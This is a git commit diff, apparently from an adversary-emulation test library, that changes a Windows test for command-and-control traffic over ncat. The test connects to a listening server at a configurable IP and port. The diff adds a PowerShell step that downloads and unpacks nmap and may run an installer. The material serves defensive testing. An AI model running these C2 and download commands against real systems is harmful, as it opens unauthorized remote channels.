Generate docs from job=validate_atomics_generate_docs branch=master

2020-02-05 17:23:40 +00:00
parent 51c70736dd
commit 1854eb9db8
2 changed files with 34 additions and 17 deletions
@@ -53,26 +53,33 @@ nc -l -p <port>
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| server_ip | The IP address or domain name of the listening server | ip | 127.0.0.1|
-| server_port | The port for the C2 connection | port number | 80|
+| server_ip | The IP address or domain name of the listening server | string | 127.0.0.1|
+| server_port | The port for the C2 connection | integer | 80|
+| ncat_exe | The location of ncat.exe | path | $env:TEMP\T1095\nmap-7.80\ncat.exe|


-#### Attack Commands: Run with `command_prompt`! 
+#### Attack Commands: Run with `powershell`! 
 ```
-ncat #{server_ip} #{server_port}
+cmd /c #{ncat_exe} #{server_ip} #{server_port}
 ```



-#### Dependencies:  Run with `command_prompt`!
-##### Description: Nmap must be installed
+#### Dependencies:  Run with `PowerShell`!
+##### Description: ncat.exe must be available at specified location (#{ncat_exe})
 ##### Check Prereq Commands:
 ```
-ncat -h 2> nul 
+if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} 
 ```
 ##### Get Prereq Commands:
 ```
-echo "Install nmap so that ncat.exe will be available for use"
+$parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parentpath\nmap.zip"
+Invoke-WebRequest  "https://nmap.org/dist/nmap-7.80-win32.zip" -OutFile "$zippath"
+Expand-Archive $zippath $parentpath -Force
+$unzipPath = Join-Path $parentPath "nmap-7.80"
+if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | ?{$_.DisplayName -like "Microsoft Visual C++*"}) ) {
+  Start-Process (Join-Path $unzipPath "vcredist_x86.exe")
+}
 ```


@@ -28120,25 +28120,35 @@ command-and-control:
        device, type the following: \nnc -l -p <port>\n"
      supported_platforms:
      - windows
-      dependency_executor_name: command_prompt
+      dependency_executor_name: PowerShell
      dependencies:
-      - description: Nmap must be installed
-        prereq_command: ncat -h 2> nul
-        get_prereq_command: echo "Install nmap so that ncat.exe will be available
-          for use"
+      - description: ncat.exe must be available at specified location (#{ncat_exe})
+        prereq_command: if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1}
+        get_prereq_command: |-
+          $parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parentpath\nmap.zip"
+          Invoke-WebRequest  "https://nmap.org/dist/nmap-7.80-win32.zip" -OutFile "$zippath"
+          Expand-Archive $zippath $parentpath -Force
+          $unzipPath = Join-Path $parentPath "nmap-7.80"
+          if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | ?{$_.DisplayName -like "Microsoft Visual C++*"}) ) {
+            Start-Process (Join-Path $unzipPath "vcredist_x86.exe")
+          }
      input_arguments:
        server_ip:
          description: The IP address or domain name of the listening server
-          type: ip
+          type: string
          default: 127.0.0.1
        server_port:
          description: The port for the C2 connection
-          type: port number
+          type: integer
          default: 80
+        ncat_exe:
+          description: The location of ncat.exe
+          type: path
+          default: "$env:TEMP\\T1095\\nmap-7.80\\ncat.exe"
      executor:
-        name: command_prompt
+        name: powershell
        elevation_required: false
-        command: 'ncat #{server_ip} #{server_port}
+        command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port}

 '
    - name: Powercat C2